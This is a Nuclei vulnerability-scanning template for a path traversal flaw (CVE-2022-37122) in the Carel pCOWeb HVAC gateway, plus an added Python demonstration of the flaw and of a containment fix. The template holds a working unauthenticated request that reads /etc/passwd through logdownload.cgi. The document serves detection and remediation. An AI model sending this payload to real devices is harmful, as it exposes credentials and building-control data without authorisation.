id: CVE-2022-37122

info:
  name: Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Path Traversal
  author: gy741
  severity: high
  description: |
    Carel pCOWeb HVAC BACnet Gateway 2.1.0 contains an unauthenticated arbitrary file disclosure caused by improper verification of the 'file' GET parameter in logdownload.cgi. An attacker who can reach the web interface can read sensitive files via directory traversal; no authentication is required.
  impact: |
    Unauthenticated attackers can read arbitrary files from the Carel pCOWeb HVAC BACnet Gateway through directory traversal in the logdownload.cgi 'file' parameter, potentially exposing configuration files, credentials, and HVAC system data.
  remediation: |
    Update Carel pCOWeb HVAC BACnet Gateway to a version later than 2.1.0 that properly validates file paths in logdownload.cgi. Until then, restrict network access to the gateway's web interface.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5709.php
    - https://www.zeroscience.mk/codes/carelpco_dir.txt
    - https://packetstormsecurity.com/files/167684/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-37122
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-37122
    cwe-id: CWE-22
    epss-score: 0.18189
    epss-percentile: 0.9684
  metadata:
    max-request: 1
    vendor: carel
    product: pcoweb_hvac_bacnet_gateway
  tags: cve,cve2022,carel,lfi,traversal,unauth,bacnet,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd"

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
# digest: 4b0a004830460221008ed64cf2c5049965cd0f8d703f057f2c6d259ef291051d76e61252a9150049f1022100ca8eb83c2e3a4eec77d5c06c043b3275878f0b6f38b0641397e65fbff2f3eb8a:922c64590222798bb761d5b6d8e72950
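The following is an added illustration and is not part of the Nuclei template or of Carel's firmware. It shows why the template's payload works: the `file` value is joined onto a log directory and normalised, so eight `../` segments collapse to `/etc/passwd`. It also shows the containment check that the remediation asks for, and applies the template's own regex matcher to tell a real `/etc/passwd` from an error page. The directory `/var/log/pcoweb`, the handler function names and the two response bodies are assumptions constructed for this demonstration; the real CGI's internals are not published.

```python
"""Added example, not part of the Nuclei template or of Carel's firmware.

Demonstrates (1) how the template's payload resolves to /etc/passwd when the
`file` parameter is joined onto a log directory with no containment check,
(2) the check that stops it, and (3) how the template's matcher separates a
real /etc/passwd from an error page. LOG_DIR and the sample response bodies
are assumptions made for this demonstration.
"""
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Request path exactly as the template sends it.
TEMPLATE_PATH = "/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd"

# Assumed directory the CGI is meant to serve log files from (not from the vendor).
LOG_DIR = "/var/log/pcoweb"

# Same regex as the template's matcher.
PASSWD_RE = re.compile(r"root:.*:0:0:")


def file_param(request_target: str) -> str:
    """Return the raw value of the GET parameter `file`, or '' if absent."""
    return parse_qs(urlsplit(request_target).query).get("file", [""])[0]


def vulnerable_resolve(log_dir: str, user_file: str) -> str:
    """Join user input onto the log directory with no containment check.

    Mirrors the flaw the advisory describes: normalisation collapses the
    `..` segments (extra ones above `/` are simply dropped) and the handler
    opens whatever path results.
    """
    return posixpath.normpath(posixpath.join(log_dir, user_file))


def hardened_resolve(log_dir: str, user_file: str) -> str:
    """Resolve the path, then refuse anything outside the log directory.

    Normalise first and compare the common prefix afterwards. Rejecting the
    literal string '..' is not enough (encodings, mixed separators, absolute
    paths); checking the final resolved path is. An absolute `user_file`
    replaces the base in posixpath.join and is therefore rejected too. On a
    live system apply os.path.realpath to both sides as well, so a symlink
    inside the log directory cannot point back out.
    """
    base = posixpath.normpath(log_dir)
    candidate = posixpath.normpath(posixpath.join(base, user_file))
    if posixpath.commonpath([base, candidate]) != base:
        raise PermissionError(f"refusing path outside {base}: {candidate}")
    return candidate


def looks_like_passwd(body: str) -> bool:
    """Apply the template's matcher to a response body."""
    return PASSWD_RE.search(body) is not None


# Constructed response bodies: what a vulnerable and a fixed device might return.
PASSWD_BODY = "root:x:0:0:root:/root:/bin/sh\ndaemon:x:1:1:daemon:/usr/sbin:/bin/false\n"
ERROR_BODY = "<html><body>403 Forbidden: invalid log file name</body></html>"

if __name__ == "__main__":
    name = file_param(TEMPLATE_PATH)
    print("vulnerable ->", vulnerable_resolve(LOG_DIR, name))
    try:
        hardened_resolve(LOG_DIR, name)
    except PermissionError as exc:
        print("hardened   ->", exc)
    print("matcher on passwd body:", looks_like_passwd(PASSWD_BODY))
    print("matcher on error body :", looks_like_passwd(ERROR_BODY))
```

The regex `root:.*:0:0:` is a reasonable positive signal because an error page or an empty response never contains a UID/GID pair of `0:0` after a `root:` field, but it is only a disclosure check; on a real engagement confirm the read with a second file that cannot be guessed from a default image.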